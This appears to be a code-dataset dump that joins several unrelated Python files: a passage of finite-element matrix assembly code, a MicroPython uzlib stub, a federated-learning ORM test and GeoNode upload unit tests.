        # Sparse-matrix COO stencil: for each cell, all (row, col) pairs of
        # its nloc local dofs, flattened in a fixed order matching the
        # nloc*nloc element matrices assembled below.
        self.cols = np.tile(dofspercell, self.nloc).ravel()
        self.rows = np.repeat(dofspercell, self.nloc).ravel()
    #Alternative
    # self.rows = dofspercell.repeat(self.nloc).reshape(self.mesh.ncells, self.nloc, self.nloc)
    # self.cols = self.rows.swapaxes(1, 2)
    # self.cols = self.cols.reshape(-1)
    # self.rows = self.rows.reshape(-1)
    # def computeStencilInnerSidesCell(self, dofspercell):
    #     nloc, faces, cellsOfFaces = self.nloc, self.mesh.faces, self.mesh.cellsOfFaces
    #     # print(f"{faces=}")
    #     # print(f"{cellsOfFaces=}")
    #     innerfaces = cellsOfFaces[:,1]>=0
    #     cellsOfInteriorFaces= cellsOfFaces[innerfaces]
    #     self.cellsOfInteriorFaces = cellsOfInteriorFaces
    #     self.innerfaces = innerfaces
    #     return
    #     # print(f"{innerfaces=}")
    #     print(f"{cellsOfInteriorFaces=}")
    #     raise NotImplementedError(f"no")
    #     ncells, nloc = dofspercell.shape[0], dofspercell.shape[1]
    #     print(f"{ncells=} {nloc=}")
    #     print(f"{dofspercell[cellsOfInteriorFaces,:].shape=}")
    #     rows = dofspercell[cellsOfInteriorFaces,:].repeat(nloc)
    #     cols = np.tile(dofspercell[cellsOfInteriorFaces,:],nloc)
    #     print(f"{rows=}")
    #     print(f"{cols=}")
    def interpolateCell(self, f):
        """Evaluate f at cell centers.

        ``f`` is either a callable f(x, y, z) applied to all cell centers, or
        a dict {label: callable} evaluated per cell-label region (labels with
        a None callable are left at zero).
        """
        if isinstance(f, dict):
            b = np.zeros(self.mesh.ncells)
            for label, fct in f.items():
                if fct is None: continue
                cells = self.mesh.cellsoflabel[label]
                xc, yc, zc = self.mesh.pointsc[cells].T
                b[cells] = fct(xc, yc, zc)
            return b
        else:
            xc, yc, zc = self.mesh.pointsc.T
            return f(xc, yc, zc)
    def computeMatrixDiffusion(self, coeff):
        """Assemble the stiffness matrix sum_K coeff*|K| grad(phi_i).grad(phi_j)."""
        ndofs = self.nunknowns()
        # matxx = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 0], self.cellgrads[:, :, 0])
        # matyy = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 1], self.cellgrads[:, :, 1])
        # matzz = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 2], self.cellgrads[:, :, 2])
        # mat = ( (matxx+matyy+matzz).T*self.mesh.dV*coeff).T.ravel()
        cellgrads = self.cellgrads[:,:,:self.mesh.dimension]
        # n: cell, i/j: local dofs, l: space dimension.
        mat = np.einsum('n,nil,njl->nij', self.mesh.dV*coeff, cellgrads, cellgrads).ravel()
        return sparse.coo_matrix((mat, (self.rows, self.cols)), shape=(ndofs, ndofs)).tocsr()
    def computeFormDiffusion(self, du, u, coeff):
        """Matrix-free residual: add the diffusion form A(u) into du in place."""
        doc = self.dofspercell()
        cellgrads = self.cellgrads[:,:,:self.mesh.dimension]
        r = np.einsum('n,nil,njl,nj->ni', self.mesh.dV*coeff, cellgrads, cellgrads, u[doc])
        # add.at accumulates correctly for repeated dof indices.
        np.add.at(du, doc, r)
    def computeMatrixLps(self, betart, **kwargs):
        """Assemble an LPS-type stabilization matrix over interior faces.

        ``betart`` holds a convection-related quantity per face (only its
        absolute value on inner faces is used); lpsparam scales the term.
        """
        param = kwargs.pop('lpsparam', 0.1)
        dimension, dV, ndofs = self.mesh.dimension, self.mesh.dV, self.nunknowns()
        nloc, dofspercell = self.nlocal(), self.dofspercell()
        # The two cells sharing each interior face.
        ci = self.mesh.cellsOfInteriorFaces
        ci0, ci1 = ci[:,0], ci[:,1]
        normalsS = self.mesh.normals[self.mesh.innerfaces]
        dS = linalg.norm(normalsS, axis=1)
        # Per-face weight: mean cell volume * lpsparam * |face| * |beta.n|.
        scale = 0.5*(dV[ci0]+ dV[ci1])
        betan = np.absolute(betart[self.mesh.innerfaces])
        # betan = 0.5*(np.linalg.norm(betaC[ci0],axis=1)+ np.linalg.norm(betaC[ci1],axis=1))
        scale *= param*dS*betan
        cg0 = self.cellgrads[ci0, :, :]
        cg1 = self.cellgrads[ci1, :, :]
        # 2x2 block structure coupling the dofs of the two neighboring cells;
        # off-diagonal blocks carry the minus sign of the gradient jump.
        mat00 = np.einsum('nki,nli,n->nkl', cg0, cg0, scale)
        mat01 = np.einsum('nki,nli,n->nkl', cg0, cg1, -scale)
        mat10 = np.einsum('nki,nli,n->nkl', cg1, cg0, -scale)
        mat11 = np.einsum('nki,nli,n->nkl', cg1, cg1, scale)
        rows0 = dofspercell[ci0,:].repeat(nloc)
        cols0 = np.tile(dofspercell[ci0,:],nloc).reshape(-1)
        rows1 = dofspercell[ci1,:].repeat(nloc)
        cols1 = np.tile(dofspercell[ci1,:],nloc).reshape(-1)
        A00 = sparse.coo_matrix((mat00.reshape(-1), (rows0, cols0)), shape=(ndofs, ndofs))
        A01 = sparse.coo_matrix((mat01.reshape(-1), (rows0, cols1)), shape=(ndofs, ndofs))
        A10 = sparse.coo_matrix((mat10.reshape(-1), (rows1, cols0)), shape=(ndofs, ndofs))
        A11 = sparse.coo_matrix((mat11.reshape(-1), (rows1, cols1)), shape=(ndofs, ndofs))
        return A00+A01+A10+A11
    def computeFormLps(self, du, u, betart, **kwargs):
        """Matrix-free version of computeMatrixLps: add the stabilization
        applied to u into du in place (uses the gradient jump u|K0 - u|K1)."""
        param = kwargs.pop('lpsparam', 0.1)
        dimension, dV, ndofs = self.mesh.dimension, self.mesh.dV, self.nunknowns()
        nloc, dofspercell = self.nlocal(), self.dofspercell()
        ci = self.mesh.cellsOfInteriorFaces
        ci0, ci1 = ci[:,0], ci[:,1]
        normalsS = self.mesh.normals[self.mesh.innerfaces]
        dS = linalg.norm(normalsS, axis=1)
        scale = 0.5*(dV[ci0]+ dV[ci1])
        betan = np.absolute(betart[self.mesh.innerfaces])
        scale *= param*dS*betan
        cg0 = self.cellgrads[ci0, :, :]
        cg1 = self.cellgrads[ci1, :, :]
        r = np.einsum('nki,nli,n,nl->nk', cg0, cg0, scale, u[dofspercell[ci0,:]]-u[dofspercell[ci1,:]])
        np.add.at(du, dofspercell[ci0,:], r)
        # mat01 = np.einsum('nki,nli,n,nl->nk', cg0, cg1, -scale, u[dofspercell[ci1,:]])
        # np.add.at(du, dofspercell[ci0,:], mat01)
        r = np.einsum('nki,nli,n,nl->nk', cg1, cg0, -scale, u[dofspercell[ci0,:]]-u[dofspercell[ci1,:]])
        np.add.at(du, dofspercell[ci1,:], r)
        # mat11 = np.einsum('nki,nli,n,nl->nk', cg1, cg1, scale, u[dofspercell[ci1,:]])
        # np.add.at(du, dofspercell[ci1,:], mat11)
    def computeFormConvection(self, du, u, data, method, **kwargs):
        """Dispatch the convection form to the chosen stabilization scheme.

        Supported: 'supg*', 'upwalg', 'upw*', 'lps'; the transport routines
        are provided by subclasses.
        """
        if method[:4] == 'supg':
            self.computeFormTransportSupg(du, u, data, method)
        elif method == 'upwalg':
            self.computeFormTransportUpwindAlg(du, u, data)
        elif method[:3] == 'upw':
            self.computeFormTransportUpwind(du, u, data, method)
        elif method == 'lps':
            self.computeFormTransportLps(du, u, data, **kwargs)
        else:
            raise NotImplementedError(f"{method=}")
    def computeMatrixConvection(self, data, method, **kwargs):
        """Matrix counterpart of computeFormConvection (same method keys)."""
        if method[:4] == 'supg':
            return self.computeMatrixTransportSupg(data, method)
        elif method == 'upwalg':
            return self.computeMatrixTransportUpwindAlg(data)
        elif method[:3] == 'upw':
            return self.computeMatrixTransportUpwind(data, method)
        elif method == 'lps':
            return self.computeMatrixTransportLps(data, **kwargs)
        else:
            raise NotImplementedError(f"{method=}")
# ------------------------------------- #
if __name__ == '__main__':
    # Smoke test: build a coarse backward-facing-step mesh.
    trimesh = SimplexMesh(geomname="backwardfacingstep", hmean=0.3)
| nilq/baby-python | python |
"""
Module: 'uzlib' on esp8266 v1.9.3
"""
# MCU: (sysname='esp8266', nodename='esp8266', release='2.0.0(5a875ba)', version='v1.9.3-8-g63826ac5c on 2017-11-01', machine='ESP module with ESP8266')
# Stubber: 1.1.2 - updated
from typing import Any
class DecompIO:
    """Firmware stub generated by micropython-stubber: method bodies are
    empty placeholders; only the names/signatures reflect the device API.
    Presumably a stream-like reader over a compressed source -- confirm
    against the MicroPython uzlib docs before relying on behavior.
    """
    def read(self, *argv) -> Any:
        pass
    def readinto(self, *argv) -> Any:
        pass
    def readline(self, *argv) -> Any:
        pass
def decompress():
    # Stub only (no-op on the host). NOTE(review): the on-device function
    # presumably takes the compressed data as an argument -- the stubber
    # does not record signatures; confirm against firmware docs.
    pass
| nilq/baby-python | python |
import sys
from random import randint
import pytest
from src.app.main.model_centric.cycles.worker_cycle import WorkerCycle
from src.app.main.model_centric.processes.fl_process import FLProcess
from . import BIG_INT
from .presets.fl_process import (
AVG_PLANS,
CLIENT_CONFIGS,
CYCLES,
MODELS,
PROTOCOLS,
SERVER_CONFIGS,
TRAINING_PLANS,
VALIDATION_PLANS,
)
from .presets.worker_cycle import WORKERS
sys.path.append(".")
@pytest.mark.parametrize(
    """model,
    avg_plan,
    train_plan,
    valid_plan,
    protocol,
    client_config,
    server_config,
    cycle,
    worker""",
    list(
        zip(
            MODELS,
            AVG_PLANS,
            TRAINING_PLANS,
            VALIDATION_PLANS,
            PROTOCOLS,
            CLIENT_CONFIGS,
            SERVER_CONFIGS,
            CYCLES,
            WORKERS,
        )
    ),
)
def test_create_worker_cycles_objects(
    model,
    avg_plan,
    train_plan,
    valid_plan,
    protocol,
    client_config,
    server_config,
    cycle,
    worker,
    database,
):
    """Persist a full FLProcess object graph plus a WorkerCycle.

    For each preset tuple, wire every component (model, plans, protocol,
    configs, cycle) to a fresh FLProcess through its relationship attribute,
    add everything to the session, and commit -- the test passes if the ORM
    accepts the whole graph without error.
    """
    new_fl_process = FLProcess(id=randint(0, BIG_INT))
    database.session.add(new_fl_process)
    # Each assignment below sets the back-reference that links the component
    # to the process; the attribute names mirror the model relationships.
    model.flprocess = new_fl_process
    database.session.add(model)
    avg_plan.avg_flprocess = new_fl_process
    database.session.add(avg_plan)
    train_plan.plan_flprocess = new_fl_process
    database.session.add(train_plan)
    valid_plan.plan_flprocess = new_fl_process
    database.session.add(valid_plan)
    protocol.protocol_flprocess = new_fl_process
    database.session.add(protocol)
    client_config.client_flprocess_config = new_fl_process
    database.session.add(client_config)
    server_config.server_flprocess_config = new_fl_process
    database.session.add(server_config)
    cycle.cycle_flprocess = new_fl_process
    database.session.add(cycle)
    # A worker participating in the cycle, keyed by its request hash.
    worker_cycle = WorkerCycle(
        id=randint(0, BIG_INT),
        request_key="long_hashcode_here",
        worker=worker,
        cycle=cycle,
    )
    database.session.add(worker_cycle)
    database.session.commit()
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2018 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
"""unit tests for geonode.upload.files module"""
from geonode.tests.base import GeoNodeBaseTestSupport
from geonode.upload import files
class FilesTestCase(GeoNodeBaseTestSupport):
    """Unit tests for the scan-hint and file-type helpers in geonode.upload.files."""

    def test_scan_hint_kml_ground_overlay(self):
        # A "kml" extension among the uploads maps to the code of the
        # "KML Ground Overlay" file type.
        result = files.get_scan_hint(["kml", "other"])
        kml_file_type = files.get_type("KML Ground Overlay")
        self.assertEqual(result, kml_file_type.code)

    def test_scan_hint_kmz_ground_overlay(self):
        # A "kmz" extension yields the literal "kmz" hint.
        result = files.get_scan_hint(["kmz", "other"])
        self.assertEqual(result, "kmz")

    def test_get_type_non_existing_type(self):
        # Unknown type names resolve to None rather than raising.
        self.assertIsNone(files.get_type("fake"))

    def test_get_type_kml_ground_overlay(self):
        file_type = files.get_type("KML Ground Overlay")
        self.assertEqual(file_type.code, "kml-overlay")
        self.assertIn("kmz", file_type.aliases)
| nilq/baby-python | python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.